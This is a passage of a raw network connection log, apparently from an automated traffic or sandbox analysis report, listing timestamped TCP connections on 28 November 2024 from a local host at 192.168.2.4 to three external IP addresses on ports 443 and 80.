                                                                                                                                          Nov 28, 2024 11:32:36.638174057 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.638256073 CET49784443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:36.656447887 CET49784443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:36.656470060 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.996857882 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.996954918 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.997020960 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:36.997493029 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:36.997512102 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:37.009560108 CET49785443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:37.009624958 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:37.009694099 CET49785443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:37.009974957 CET49785443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:37.010003090 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:38.423615932 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:38.423894882 CET49785443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:38.423913956 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:38.424242020 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:38.424609900 CET49785443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:38.424659967 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:38.424845934 CET49785443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:38.467340946 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:38.944796085 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:38.944869995 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:38.944937944 CET49785443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:38.953447104 CET49785443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:38.953460932 CET44349785149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:42.451046944 CET4978680192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:42.451369047 CET4978780192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:42.551028967 CET4978880192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:42.570993900 CET80497865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:42.571079016 CET4978680192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:42.571235895 CET80497875.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:42.571252108 CET4978680192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:42.571294069 CET4978780192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:42.670902014 CET80497885.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:42.671004057 CET4978880192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:42.691114902 CET80497865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:43.864573002 CET80497865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:43.905150890 CET4978680192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:44.008723974 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:44.008805990 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:44.008905888 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:44.009124041 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:44.009160995 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:45.463915110 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:45.464416027 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:45.464442968 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:45.464768887 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:45.464838028 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:45.465378046 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:45.465423107 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:45.466624022 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:45.466679096 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:45.466943979 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:45.466959000 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:45.513204098 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:46.952801943 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:46.952826977 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:46.952832937 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:46.952914000 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:46.952941895 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:46.952956915 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:46.989139080 CET49790443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:46.989177942 CET443497905.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:46.989258051 CET49790443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:46.989474058 CET49790443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:46.989486933 CET443497905.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:46.996049881 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.036660910 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.036669970 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.036708117 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.036755085 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.036940098 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.036947966 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.041235924 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.041271925 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.041341066 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.041656971 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.041699886 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.042958975 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.043149948 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.043179989 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.043235064 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.043476105 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.043489933 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.043996096 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.044014931 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.044029951 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.044217110 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.044234991 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.044353008 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.044368029 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.044502020 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.044513941 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.079997063 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.143951893 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.143960953 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.144004107 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.144059896 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.144088984 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.172514915 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.172523022 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.172549009 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.172625065 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.172676086 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.202931881 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.202939034 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.203027010 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.203057051 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.237031937 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.237067938 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.237102985 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.237128019 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.237144947 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.250272036 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.250278950 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.250345945 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.250360012 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.299331903 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.344948053 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.344955921 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.344983101 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.345025063 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.345066071 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.345077991 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.358481884 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.358489037 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.358524084 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.358558893 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.358597040 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.358628988 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.358670950 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.358720064 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.358937979 CET49789443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.358972073 CET443497895.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.359297037 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.359335899 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:47.359390020 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.361087084 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:47.361100912 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.456556082 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.456769943 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.465732098 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.465749979 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.465858936 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.465874910 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.466422081 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.466434002 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.466483116 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.466545105 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.467184067 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.467227936 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.467297077 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.467348099 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.468179941 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.468255997 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.468961954 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.469029903 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.469136953 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.469151974 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.469305992 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.469320059 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.502135038 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.502372980 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.502417088 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.502839088 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.503269911 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.503364086 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.503396988 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.519524097 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.523957968 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.547852039 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.548105001 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.548132896 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.548690081 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.548752069 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.549631119 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.549683094 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.549823046 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.549925089 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.549953938 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.549968004 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.549978971 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.550019026 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.551347017 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.555233955 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.811922073 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.815110922 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.815126896 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.815463066 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.815515041 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.816052914 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.816092014 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.816469908 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.816523075 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.816689968 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.816703081 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.861042023 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:48.863646984 CET80497865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:48.863698006 CET4978680192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.003499031 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.003578901 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.003676891 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.004612923 CET49793443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.004628897 CET443497935.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.004976034 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.005021095 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.005074978 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.005808115 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.005820990 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.007946968 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.007967949 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.008008957 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.008023977 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.008033037 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.008065939 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.008681059 CET49792443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.008697987 CET443497925.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.070220947 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.070244074 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.070251942 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.070295095 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.070311069 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.070353985 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.070353985 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.071613073 CET49791443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.071650028 CET443497915.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.361037016 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.361109972 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.361208916 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.362215042 CET49795443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.362232924 CET443497955.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.483374119 CET4978680192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.604743004 CET80497865.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.780788898 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.780817032 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.780920982 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.780940056 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.828984022 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.862432003 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.862448931 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.862536907 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:49.977305889 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.977319002 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:49.977407932 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.012234926 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.012738943 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.030668974 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.030791044 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.072887897 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.073067904 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.085398912 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.085474014 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.085486889 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.085530043 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.086078882 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.086078882 CET49794443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.086087942 CET443497945.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.089593887 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.089720964 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.089812040 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.090018988 CET49798443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.090039015 CET443497985.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.090100050 CET49798443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.090244055 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.090279102 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.090365887 CET49798443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.090377092 CET443497985.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.505466938 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.505774021 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.505790949 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.506370068 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.506737947 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.506814957 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.506829977 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:50.551337004 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:50.557878971 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:51.067605019 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:51.067684889 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:51.067744970 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:51.068475008 CET49796443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:51.068490982 CET443497965.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:51.496695042 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:51.497023106 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:51.497086048 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:51.497440100 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:51.497872114 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:51.497941971 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:51.497994900 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:51.543334007 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:51.544878960 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:52.053870916 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.053891897 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.053904057 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.053976059 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:52.054024935 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.102580070 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:52.136718988 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.136725903 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.136749983 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.136795998 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:52.136842012 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:52.234695911 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.234702110 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.234800100 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:52.260361910 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.260369062 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.260472059 CET49797443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:32:52.293631077 CET443497975.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:52.293638945 CET443497975.57.41.119192.168.2.4
